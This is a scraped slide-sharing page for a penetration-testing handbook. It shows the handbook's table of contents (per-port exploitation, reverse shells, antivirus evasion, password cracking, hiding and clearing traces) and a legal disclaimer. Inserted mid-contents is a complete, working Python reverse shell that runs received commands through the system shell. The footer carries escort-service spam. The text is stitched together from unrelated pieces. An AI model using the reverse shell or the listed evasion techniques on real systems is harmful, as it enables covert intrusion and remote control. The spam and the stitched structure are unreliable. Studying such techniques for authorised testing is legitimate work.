TCP/IP Penetration Test - Exploitation
Page 1 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
Summary:
TCP/IP Penetration Test - Exploitation
Description of the last modification:
Insert description of the last modification here
Issued by: LUIGI CAPUZZELLO
Date: 10/05/2022
INDEX
1. LEGAL DISCLAIMER ................................................................................................................................................... 8
2. PENETRATION TEST PATH PHASES DESCRIPTION ...................................................................................................... 9
3. ETH-TCP/IP ATTACK PATH DESCRIPTION..................................................................................................................10
3.1. ATTACK PATH SHORT DESCRIPTION .................................................................................................................................. 12
4. GETTING COMFORTABLE WITH KALI LINUX..............................................................................................................13
4.1. TMUX....................................................................................................................................................................... 13
4.2. EDITOR VI ................................................................................................................................................................... 14
4.3. HOW TO INSTALL / UPDATE A PROGRAM ......................................................................................................... 15
4.4. FIRST ACCESS TO KALI ................................................................................................................................................... 16
5. MANAGING KALI LINUX SERVICES............................................................................................................................18
5.1. SSH SERVICE............................................................................................................................................................... 18
How to activate SSH Server ............................................................................................................................. 18
Useful commands............................................................................................................................ 19
5.2. HTTP SERVICE............................................................................................................................................................. 20
5.3. FTP SERVICE ............................................................................................................................................................... 20
5.4. TFTPD SERVICE........................................................................................................................................................... 21
5.5. SAMBA SERVICE......................................................................................................................................................... 21
5.6. VNC SERVICE.............................................................................................................................................................. 22
6. BASH: USEFUL COMMAND.......................................................................................................................................22
6.1. USEFUL COMMAND LIST ................................................................................................................................. 22
6.2. GREP - AWK - SED.................................................................................................................................... 25
6.3. COMM: FILE COMPARISON ........................................................................................................................................... 26
7. INFORMATION GATHERING.....................................................................................................................................26
7.1. INTERNAL NETWORK SCAN.............................................................................................................................................. 27
7.2. TARGET INFO ............................................................................................................................................... 27
7.3. OSINT....................................................................................................................................................... 28
7.4. DNS: DEFINE ATTACK SURFACE ....................................................................................................................................... 28
7.5. INFORMATION GATHERING FROM WEB: SHODAN - CENSYS ................................................................................................... 30
7.6. MALTEGO................................................................................................................................................................... 30
7.7. FACEBOOK .................................................................................................................................................................. 30
8. SERVICE INFORMATION GATHERING .......................................................................................................................32
8.1. NMAP........................................................................................................................................................................ 32
9. EXPLOITATION .........................................................................................................................................................34
9.1. EXPLOITATION WITH AUTOMATED TOOLS .......................................................................................................................... 34
nmap ............................................................................................................................................................... 34
Sites ................................................................................................................................................................. 35
Nessus.............................................................................................................................................................. 35
openVAS .......................................................................................................................................................... 36
Metasploit ....................................................................................................................................................... 38
Searchsploit / Metasploit: Known vulnerabilities .............................................................................. 39
Metasploit: checking exploits that do not work................................................................................ 39
Meterpreter..................................................................................................................................................... 39
Armitage: Metasploit Interface....................................................................................................................... 41
Nessus and Metasploit ................................................................................................................... 44
How to compile an exploit manually............................................................................................................. 45
9.2. [21] - FTP.................................................................................................................................................................. 46
Service Fingerprint........................................................................................................................................... 46
AuthN bypass: Anonymous Access .................................................................................................................. 46
AuthN bypass: Bruteforce................................................................................................................................ 46
Information Exposure ...................................................................................................................................... 46
Reverse Shell Activation .................................................................................................................................. 47
DOS.................................................................................................................................................................. 47
9.4. [22, 80, 445] - GIT..................................................................................................................................................... 48
AuthN bypass: Known Vuln ............................................................................................................................. 48
Information Exposure ...................................................................................................................................... 48
9.5. [22] - SSH ................................................................................................................................................................. 50
Service Fingerprint........................................................................................................................................... 50
AuthN Bypass: Connect through found key..................................................................................................... 50
AuthN bypass: Bruteforce................................................................................................................................ 50
AuthN bypass: Known Vuln ............................................................................................................................. 50
9.6. [22, 80, 443, 3690] - SVN.......................................................................................................................................... 52
AuthN bypass: Known Vuln ............................................................................................................................. 52
9.7. [23] - TELNET.............................................................................................................................................................. 52
AuthN bypass: Bruteforce................................................................................................................................ 52
9.8. [25] - SMTP .............................................................................................................................................................. 52
Service Fingerprint........................................................................................................................................... 52
AuthN bypass: Bruteforce................................................................................................................................ 52
Information Exposure ...................................................................................................................................... 53
Reverse Shell Activation .................................................................................................................................. 53
9.9. [50, 51, 500(UDP)] - IPSEC AND VPN ............................................................................................................. 54
AuthN bypass: Bruteforce................................................................................................................................ 54
9.10. [53] - DNS............................................................................................................................................................... 55
Service Fingerprint......................................................................................................................................... 55
Information Exposure.................................................................................................................................... 55
9.11. [69] - TFTP............................................................................................................................................. 55
Service Fingerprint......................................................................................................................................... 55
9.12. [79] - FINGER............................................................................................................................................................ 56
Information Exposure.................................................................................................................................... 56
9.13. [80] - HTTP ............................................................................................................................................................. 56
9.14. [88] - KERBEROS........................................................................................................................................................ 57
Information Exposure.................................................................................................................................... 57
9.15. [110] - POP3.......................................................................................................................................... 57
9.16. [111, 2049] - NFS / RPC ......................................................................................................................... 58
Information Exposure.................................................................................................................................... 58
9.17. [123] - NTP............................................................................................................................................................. 59
Information Exposure.................................................................................................................................... 59
9.18. [143 / 993]: IMAP................................................................................................................................................... 59
Information Exposure.................................................................................................................................... 59
9.19. [161] - SNMP.......................................................................................................................................................... 60
Service Fingerprint......................................................................................................................................... 60
AuthN bypass: Bruteforce.............................................................................................................................. 60
Information Exposure.................................................................................................................................... 60
9.20. [389] AD................................................................................................................................................................. 61
Information Exposure.................................................................................................................................... 61
9.21. [389] LDAP............................................................................................................................................................. 62
Information Exposure.................................................................................................................................... 63
9.22. [443] - HTTPS ......................................................................................................................................................... 65
9.23. [443, 8443] - OPENVPN............................................................................................................................................ 66
AuthN bypass: Bruteforce.............................................................................................................................. 66
9.24. [445] - SMB ............................................................................................................................................................ 67
Service Fingerprint......................................................................................................................................... 67
AuthN bypass: Bruteforce.............................................................................................................................. 67
Information Exposure.................................................................................................................................... 67
Reverse Shell Activation ................................................................................................................................ 75
9.25. [1433] - MSSQL...................................................................................................................................................... 78
Service Fingerprint......................................................................................................................................... 78
AuthN bypass: Bruteforce.............................................................................................................. 78
Information Exposure.................................................................................................................................... 78
Reverse Shell Activation ................................................................................................................................ 79
9.26. [1521] - ORACLE..................................................................................................................................................... 80
Information Exposure: msfconsole ................................................................................................................ 80
Information Exposure: ODAT......................................................................................................................... 80
Reverse Shell Activation ................................................................................................................................ 83
9.27. [3128] - SQUID ......................................................................................................................................................... 87
Reverse Shell Activation ................................................................................................................................ 87
9.28. [3260] - ISCSI.......................................................................................................................................................... 88
Information Exposure.................................................................................................................................... 88
9.29. [3306] - MYSQL / MARIADB..................................................................................................................... 89
Service Fingerprint......................................................................................................................................... 89
AuthN bypass: Anonymous Access ................................................................................................................ 89
AuthN bypass: Bruteforce.............................................................................................................................. 89
Information Exposure.................................................................................................................................... 89
Reverse Shell Activation: with searchsploit ................................................................................... 90
Reverse Shell Activation: with UDF exploitation ............................................................................ 90
9.30. [3389] - RDP........................................................................................................................................................... 92
Service Fingerprint......................................................................................................................................... 92
AuthN bypass: Bruteforce.............................................................................................................................. 92
9.31. [5900] - VNC........................................................................................................................................................... 93
Service Fingerprint......................................................................................................................................... 93
AuthN bypass: Bruteforce.............................................................................................................................. 93
9.32. [5985] - WINRM ..................................................................................................................................... 93
Reverse Shell Activation ................................................................................................................................ 93
9.33. [6379]: REDIS......................................................................................................................................................... 94
Information Exposure.................................................................................................................................... 94
Reverse Shell Activation ................................................................................................................................ 94
PostExploitation: write file (SSH / HTTP / CRONTAB) .................................................................................... 95
9.34. [8000] JDWP: JAVA DEBUGGING PORT ........................................................................................................................ 97
Reverse Shell Activation ................................................................................................................................ 97
9.35. [8000] - AJENTI ........................................................................................................................................................ 97
Reverse Shell Activation ................................................................................................................................ 97
9.36. [8080] TOMCAT ..................................................................................................................................................... 98
Reverse Shell Activation ................................................................................................................................ 98
AuthN bypass ................................................................................................................................................ 98
Reverse Shell Activation ................................................................................................................................ 98
9.37. [9200] - ELASTICSEARCH ........................................................................................................................... 99
Service Fingerprint......................................................................................................................................... 99
Information Exposure.................................................................................................................................... 99
9.39. [10000] - WEBMIN.................................................................................................................................................101
Reverse Shell Activation: with meterpreter (credentials may be required) ....................................101
Reverse Shell Activation: manually (without credentials) .............................................................102
9.40. [11211] - MEMCACHED............................................................................................................................................102
Information Exposure..................................................................................................................................102
9.41. [27017] - MONGODB .............................................................................................................................................104
Service Fingerprint.......................................................................................................................................104
AuthN bypass: Bruteforce............................................................................................................................104
Information Exposure..................................................................................................................................104
10. MODULE: CREATE A REVERSE SHELL ....................................................................................................................106
10.1. ![WINDOWS] BY MEANS OF SETOOLKIT .........................................................................................................106
10.2. MANUALLY..............................................................................................................................................................107
[windows]: reverse shell ..............................................................................................................................107
[windows]: reverse shell ..............................................................................................................................108
[windows]: execute command.....................................................................................................................109
10.3. BY MEANS OF TOOL: NETCAT, SOCAT, NC .......................................................................................................................109
[Windows-Linux] Netcat..............................................................................................................................109
socat............................................................................................................................................................110
NCat.............................................................................................................................................................110
10.4. BY MEANS OF MSFVENOM: EXE, ELF, PHP, ASP, JSP, WAR..................................................................................................110
[Windows]: reverse shell/ bind shell / execute command / embedded execution ......................................110
[Windows] Reverse shell nishang ................................................................................................................111
[Linux]: reverse shell / bind shell .................................................................................................................111
[Linux] PHP: reverse shell ............................................................................................................................112
[Windows] ASP/ASPX: reverse shell.............................................................................................................112
WAR: reverse shell.......................................................................................................................................112
JSP: reverse shell..........................................................................................................................................112
10.5. BY MEANS OF SCRIPTING LANGUAGE: BASH, PERL, PYTHON, PHP, POWERSHELL ....................................................................112
[Linux] bash .................................................................................................................................................113
[Linux] Perl...................................................................................................................................................113
[Linux] python..............................................................................................................................................113
[Linux] PHP ..................................................................................................................................................113
[Windows] Powershell.................................................................................................................................113
10.7. AV EVASION ...........................................................................................................................................................114
![windows] msfvenom -> doubled enc.........................................................................................................114
manually......................................................................................................................................................117
by means of Shellter ....................................................................................................................................119
by means of mimikatz .................................................................................................................................120
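The entries of module 10.5 list one-liners in several languages that all implement the same mechanism: the target opens an outbound TCP connection to the attacker's listener and pipes a shell over it. The following Python script is an added example (not code from the original document) that shows both ends of that exchange in one process so it runs offline: the listener binds an ephemeral port on 127.0.0.1 and the "victim" connects back from a thread. The END_MARKER delimiter and the simulated victim are assumptions of the demo; on an engagement the listener is simply `nc -lvnp <port>` on your host.

```python
import socket
import subprocess
import threading

# Delimiter the victim appends after each command's output so the listener
# knows where one response ends (a constructed convention for this demo;
# netcat-style shells just stream raw bytes).
END_MARKER = b"__END__\n"


def reverse_shell(lhost: str, lport: int) -> None:
    """Victim side: connect back to lhost:lport and execute each line received.

    Every line is run through the system shell; stdout and stderr are sent
    back followed by END_MARKER. An empty line or "exit" closes the session.
    The outbound connection is what lets this pass egress filters that would
    block an inbound bind shell.
    """
    with socket.create_connection((lhost, lport)) as sock:
        reader = sock.makefile("rb")
        for line in reader:
            cmd = line.decode(errors="replace").strip()
            if cmd in ("", "exit"):
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            sock.sendall(proc.stdout + proc.stderr + END_MARKER)


def attacker_session(commands: list, lhost: str = "127.0.0.1") -> list:
    """Attacker side: listen on an ephemeral port, wait for the connect-back,
    send each command and collect its output.

    The victim runs in a thread of this same process so the exchange works
    offline (assumption for the demo). Returns one bytes object per command.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((lhost, 0))          # port 0: let the OS pick a free port
    listener.listen(1)
    listener.settimeout(5)             # do not hang forever if nothing connects
    lport = listener.getsockname()[1]

    victim = threading.Thread(target=reverse_shell, args=(lhost, lport), daemon=True)
    victim.start()

    outputs = []
    conn, _peer = listener.accept()
    with conn:
        reader = conn.makefile("rb")
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            chunks = []
            for line in reader:
                # Output may not end with a newline, so the marker can be glued
                # to the last line; strip it rather than requiring a bare marker.
                if line.endswith(END_MARKER):
                    chunks.append(line[: -len(END_MARKER)])
                    break
                chunks.append(line)
            outputs.append(b"".join(chunks))
        conn.sendall(b"exit\n")        # terminate the victim loop cleanly
    victim.join(timeout=5)
    listener.close()
    return outputs


if __name__ == "__main__":
    for out in attacker_session(["whoami", "hostname"]):
        print(out.decode(errors="replace").rstrip())
```

The per-command delimiter is only there so the demo can return discrete results; a real listener (netcat, socat, Metasploit's multi/handler) reads the stream interactively and needs no framing.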
11. MODULE SCRIPTING: USEFUL SCRIPT ...................................................................................................................127
11.1. JAVASCRIPT: IMPLEMENT POST ..................................................................................................................................127
11.2. LUA: READ / WRITE FILE............................................................................................................................................127
11.3. LUA: EXECUTE COMMAND.........................................................................................................................................128
11.4. PYTHON: BRUTEFORCE SOCKET TCP/UDP READING DATA FROM A FILE ..............................................................................128
11.5. PYTHON: BRUTEFORCE SOCKET ...................................................................................................................................129
11.6. PYTHON: READ DATA FROM MYSQL..............................................................................................................................129
11.7. PYTHON: TAKE DATA FROM A WEB PAGE, PROCESS IT AND SEND RESULT VIA POST ...............................................................130
11.8. PYTHON: BRUTEFORCE BY MEANS OF ANTI-CSRF ...........................................................................................................131
11.9. PYTHON: BRUTEFORCE SMTP....................................................................................................................................132
11.10. PYTHON: CRACK ENCRYPTED INFO KNOWING ALGORITHM WITH BRUTE FORCE ..................................................................134
11.11. PYTHON: CRACK ENCRYPTED INFO KNOWING ALGORITHM WITH DICTIONARY ...................................................................134
11.12. PYTHON: LFI.........................................................................................................................................................135
11.13. PHP: CRACK SALTED HASH PASSWORD......................................................................................................................136
12. MODULE: BRUTE FORCE.......................................................................................................................................137
13. MODULE: PASSWORD CRACKING.........................................................................................................................137
13.1. TOOLS..................................................................................................................................................................137
hashcat........................................................................................................................................................137
John The Ripper ...........................................................................................................................................137
hydra ...........................................................................................................................................................138
13.2. DICTIONARY.........................................................................................................................................................139
Ready to use ................................................................................................................................................139
Ready to use with HASH ..............................................................................................................................139
create one with john....................................................................................................................................139
create one manually....................................................................................................................................140
13.3. CRACK PASSWORD ON-LINE.......................................................................................................................................141
online Site....................................................................................................................................................141
13.4. CRACK PASSWORD OFF-LINE......................................................................................................................................141
Python: Crack Salted Hash Password ..........................................................................................................141
.htpasswd ....................................................................................................................................................142
Cisco Password Type 5, 7.............................................................................................................................142
Crack: Mozilla profile .default .....................................................................................................................143
Crack Groups.xml.........................................................................................................................................143
Generic hashes: John .....................................................................................................................143
Generic hashes: rcrack...................................................................................................................145
Generic hashes: RAINBOW TABLE .................................................................................................145
Generic hashes: ophcrack..............................................................................................................145
Crack Linux password ................................................................................................................................146
Crack: LUKS file..........................................................................................................................................146
JWT signature: hashcat....................................................................................................................147
.KIRBI (Kerberos Token) .............................................................................................................................147
MD5: hashcat ............................................................................................................................................148
PKI: private key with password .................................................................................................................148
VNC............................................................................................................................................................149
Windows Password Hash Cracking............................................................................................................153
Windows Password: john ..........................................................................................................................162
Windows: .dit and .bin...................................................................................................................163
WPA/WPA2: hashcat.................................................................................................................................164
WPA/WPA2: pyrit......................................................................................................................................164
WPA/WPA2: aircrack / john ......................................................................................................................165
ZIP..............................................................................................................................................................166
14. IPV6 .....................................................................................................................................................................166
14.1. NOTATIONS.............................................................................................................................................................166
14.2. TYPES OF ADDRESSING ..............................................................................................................................................166
14.3. SPECIAL ADDRESSING..................................................................................................................................169
14.4. IPV6: ATTACK MANUALLY..........................................................................................................................................169
80: http....................................................................................................................................................................170
14.5. IPV6: ATTACK WITH ALIVE6 .......................................................................................................................................170
14.6. LOOKING AROUND ...................................................................................................................................................171
14.7. SETTING A GLOBAL ADDRESS ......................................................................................................................................171
14.8. IPV6 AND METASPLOIT .............................................................................................................................................172
14.9. SETTING UP AN IPV6 TUNNEL........................................................................................................................175
15. APPENDIX: BECOME SILENT. ................................................................................................................................177
15.1. IPTABLES.................................................................................................................................................................177
15.2. TORTUNNEL - PROXYCHAINS........................................................................................................................................177
15.3. PROXYCHAIN...........................................................................................................................................................178
15.4. TOR......................................................................................................................................................................178
16. APPENDIX: CLEAN TRACES. ..................................................................................................................................180
17. APPENDIX: BASH SCRIPTING ................................................................................................................................180
17.1. VARIABLE................................................................................................................................................................180
17.2. FUNCTION ARGUMENTS ..............................................................................................................................180
17.3. READ USER INPUT.....................................................................................................................................................180
17.4. IF / ELSE STATEMENT...............................................................................................................................................181
17.5. FOR LOOP .............................................................................................................................................181
17.6. WHILE LOOP..........................................................................................................................................182
17.7. FUNCTION ...........................................................................................................................................................182
18. APPENDIX: DOCKER .............................................................................................................................................183
1. LEGAL DISCLAIMER
Usage of this document for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. The author assumes no liability and is not responsible for any
misuse or damage caused by this document.

More Related Content

Similar to Penetration Test Black Box type - exploitation phase

S Pii Plus+C+Library+Programmer+Guide
S Pii Plus+C+Library+Programmer+GuideS Pii Plus+C+Library+Programmer+Guide
S Pii Plus+C+Library+Programmer+Guideguestd2fe1e
ย 
Wp Tools6 Manual
Wp Tools6 ManualWp Tools6 Manual
Wp Tools6 Manualguest02e043
ย 
B035-2447-220K.pdf
B035-2447-220K.pdfB035-2447-220K.pdf
B035-2447-220K.pdfdegido10
ย 
100302 going mobile
100302 going mobile100302 going mobile
100302 going mobileErin Mote
ย 
Senior Project: Methanol Injection Progressive Controller
Senior Project: Methanol Injection Progressive Controller Senior Project: Methanol Injection Progressive Controller
Senior Project: Methanol Injection Progressive Controller QuyenVu47
ย 
The Heart of KOOBFACE
The Heart of KOOBFACEThe Heart of KOOBFACE
The Heart of KOOBFACETrend Micro
ย 
Spi research paper
Spi research paperSpi research paper
Spi research paperQuyenVu47
ย 
Fortigate utm-40-mr1
Fortigate utm-40-mr1Fortigate utm-40-mr1
Fortigate utm-40-mr1Yusuf Usmani
ย 
Qosfor ISP-Aug-2000
Qosfor ISP-Aug-2000Qosfor ISP-Aug-2000
Qosfor ISP-Aug-2000Andrew Bonar
ย 
Specification of the Linked Media Layer
Specification of the Linked Media LayerSpecification of the Linked Media Layer
Specification of the Linked Media LayerLinkedTV
ย 
An introduction to tivoli net view for os 390 v1r2 sg245224
An introduction to tivoli net view for os 390 v1r2 sg245224An introduction to tivoli net view for os 390 v1r2 sg245224
An introduction to tivoli net view for os 390 v1r2 sg245224Banking at Ho Chi Minh city
ย 
Lartc
LartcLartc
Lartcgobed
ย 
Ibm tivoli web access for information management sg246823
Ibm tivoli web access for information management sg246823Ibm tivoli web access for information management sg246823
Ibm tivoli web access for information management sg246823Banking at Ho Chi Minh city
ย 
VoLTE and ViLTE.pdf
VoLTE and ViLTE.pdfVoLTE and ViLTE.pdf
VoLTE and ViLTE.pdfAsitSwain5
ย 
Winter Internship at WSS Ahmedabad
Winter Internship at WSS Ahmedabad Winter Internship at WSS Ahmedabad
Winter Internship at WSS Ahmedabad RonakPandya10
ย 
ClipFlair Final Version of the Platform
ClipFlair Final Version of the PlatformClipFlair Final Version of the Platform
ClipFlair Final Version of the PlatformClipFlair
ย 

Similar to Penetration Test Black Box type - exploitation phase (20)

S Pii Plus+C+Library+Programmer+Guide
S Pii Plus+C+Library+Programmer+GuideS Pii Plus+C+Library+Programmer+Guide
S Pii Plus+C+Library+Programmer+Guide
ย 
Wp Tools6 Manual
Wp Tools6 ManualWp Tools6 Manual
Wp Tools6 Manual
ย 
B035-2447-220K.pdf
B035-2447-220K.pdfB035-2447-220K.pdf
B035-2447-220K.pdf
ย 
100302 going mobile
100302 going mobile100302 going mobile
100302 going mobile
ย 
Senior Project: Methanol Injection Progressive Controller
Senior Project: Methanol Injection Progressive Controller Senior Project: Methanol Injection Progressive Controller
Senior Project: Methanol Injection Progressive Controller
ย 
Lfa
LfaLfa
Lfa
ย 
The Heart of KOOBFACE
The Heart of KOOBFACEThe Heart of KOOBFACE
The Heart of KOOBFACE
ย 
Spi research paper
Spi research paperSpi research paper
Spi research paper
ย 
Version 2.1.1 (juin 2019) interface SIP FFTรฉlรฉcoms pour interconnexion voix (...
Version 2.1.1 (juin 2019) interface SIP FFTรฉlรฉcoms pour interconnexion voix (...Version 2.1.1 (juin 2019) interface SIP FFTรฉlรฉcoms pour interconnexion voix (...
Version 2.1.1 (juin 2019) interface SIP FFTรฉlรฉcoms pour interconnexion voix (...
ย 
Fortigate utm-40-mr1
Fortigate utm-40-mr1Fortigate utm-40-mr1
Fortigate utm-40-mr1
ย 
Qosfor ISP-Aug-2000
Qosfor ISP-Aug-2000Qosfor ISP-Aug-2000
Qosfor ISP-Aug-2000
ย 
Specification of the Linked Media Layer
Specification of the Linked Media LayerSpecification of the Linked Media Layer
Specification of the Linked Media Layer
ย 
An introduction to tivoli net view for os 390 v1r2 sg245224
An introduction to tivoli net view for os 390 v1r2 sg245224An introduction to tivoli net view for os 390 v1r2 sg245224
An introduction to tivoli net view for os 390 v1r2 sg245224
ย 
IP interconnexion : interface specification based on SIP/SDP (v2.1)
IP interconnexion : interface specification based on SIP/SDP (v2.1)IP interconnexion : interface specification based on SIP/SDP (v2.1)
IP interconnexion : interface specification based on SIP/SDP (v2.1)
ย 
Lartc
LartcLartc
Lartc
ย 
Ibm tivoli web access for information management sg246823
Ibm tivoli web access for information management sg246823Ibm tivoli web access for information management sg246823
Ibm tivoli web access for information management sg246823
ย 
VoLTE and ViLTE.pdf
VoLTE and ViLTE.pdfVoLTE and ViLTE.pdf
VoLTE and ViLTE.pdf
ย 
Winter Internship at WSS Ahmedabad
Winter Internship at WSS Ahmedabad Winter Internship at WSS Ahmedabad
Winter Internship at WSS Ahmedabad
ย 
ClipFlair Final Version of the Platform
ClipFlair Final Version of the PlatformClipFlair Final Version of the Platform
ClipFlair Final Version of the Platform
ย 
IP interconnexion : interface specification based on SIP/SDP (v2.1) - Nouvell...
IP interconnexion : interface specification based on SIP/SDP (v2.1) - Nouvell...IP interconnexion : interface specification based on SIP/SDP (v2.1) - Nouvell...
IP interconnexion : interface specification based on SIP/SDP (v2.1) - Nouvell...
ย 

More from luigi capuzzello

penetration testing - black box type.
penetration testing - black box type.penetration testing - black box type.
penetration testing - black box type.luigi capuzzello
ย 
Scacchi: tattiche di base.
Scacchi: tattiche di base.Scacchi: tattiche di base.
Scacchi: tattiche di base.luigi capuzzello
ย 
Cutting out Malware
Cutting out MalwareCutting out Malware
Cutting out Malwareluigi capuzzello
ย 
Regular expression
Regular expressionRegular expression
Regular expressionluigi capuzzello
ย 
Buffer Overflow - Shellcode - Shatter Attack
Buffer Overflow - Shellcode - Shatter AttackBuffer Overflow - Shellcode - Shatter Attack
Buffer Overflow - Shellcode - Shatter Attackluigi capuzzello
ย 
Assembly and Reverse Engineering
Assembly and Reverse EngineeringAssembly and Reverse Engineering
Assembly and Reverse Engineeringluigi capuzzello
ย 
Sicurezza informatica
Sicurezza informaticaSicurezza informatica
Sicurezza informaticaluigi capuzzello
ย 

More from luigi capuzzello (8)

penetration testing - black box type.
penetration testing - black box type.penetration testing - black box type.
penetration testing - black box type.
ย 
Scacchi: tattiche di base.
Scacchi: tattiche di base.Scacchi: tattiche di base.
Scacchi: tattiche di base.
ย 
Cutting out Malware
Cutting out MalwareCutting out Malware
Cutting out Malware
ย 
Perl
PerlPerl
Perl
ย 
Regular expression
Regular expressionRegular expression
Regular expression
ย 
Buffer Overflow - Shellcode - Shatter Attack
Buffer Overflow - Shellcode - Shatter AttackBuffer Overflow - Shellcode - Shatter Attack
Buffer Overflow - Shellcode - Shatter Attack
ย 
Assembly and Reverse Engineering
Assembly and Reverse EngineeringAssembly and Reverse Engineering
Assembly and Reverse Engineering
ย 
Sicurezza informatica
Sicurezza informaticaSicurezza informatica
Sicurezza informatica
ย 

Recently uploaded

Delhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 โ˜Žโœ”๐Ÿ‘Œโœ” Whatsapp Hard And Sexy Vip Callshivangimorya083
ย 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN โ˜
ย 
Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Saket Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”soniya singh
ย 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
ย 
VIP Call Girls Kolkata Ananya ๐ŸคŒ 8250192130 ๐Ÿš€ Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya ๐ŸคŒ  8250192130 ๐Ÿš€ Vip Call Girls KolkataVIP Call Girls Kolkata Ananya ๐ŸคŒ  8250192130 ๐Ÿš€ Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya ๐ŸคŒ 8250192130 ๐Ÿš€ Vip Call Girls Kolkataanamikaraghav4
ย 
Chennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts serviceChennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts service
Chennai Call Girls Alwarpet Phone ๐Ÿ† 8250192130 ๐Ÿ‘… celebrity escorts servicevipmodelshub1
ย 
Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Defence Colony Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”soniya singh
ย 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
ย 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
ย 
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...Diya Sharma
ย 
VIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar ๐Ÿ‘‰ 8250192130 Available With Roomdivyansh0kumar0
ย 
Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky โค๏ธ 7710465962 Independent Call Girls In C...Sheetaleventcompany
ย 
VIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130  Available With RoomVIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130  Available With Room
VIP Kolkata Call Girl Salt Lake ๐Ÿ‘‰ 8250192130 Available With Roomishabajaj13
ย 
Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”
Call Girls In Model Towh Delhi ๐Ÿ’ฏCall Us ๐Ÿ”8264348440๐Ÿ”soniya singh
ย 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
ย 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural  in villages of indiaGram Darshan PPT cyber rural  in villages of india
Gram Darshan PPT cyber rural in villages of indiaimessage0108
ย 
Model Call Girl in Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”
Model Call Girl in  Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”Model Call Girl in  Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”
Model Call Girl in Jamuna Vihar Delhi reach out to us at ๐Ÿ”9953056974๐Ÿ”9953056974 Low Rate Call Girls In Saket, Delhi NCR
ย 
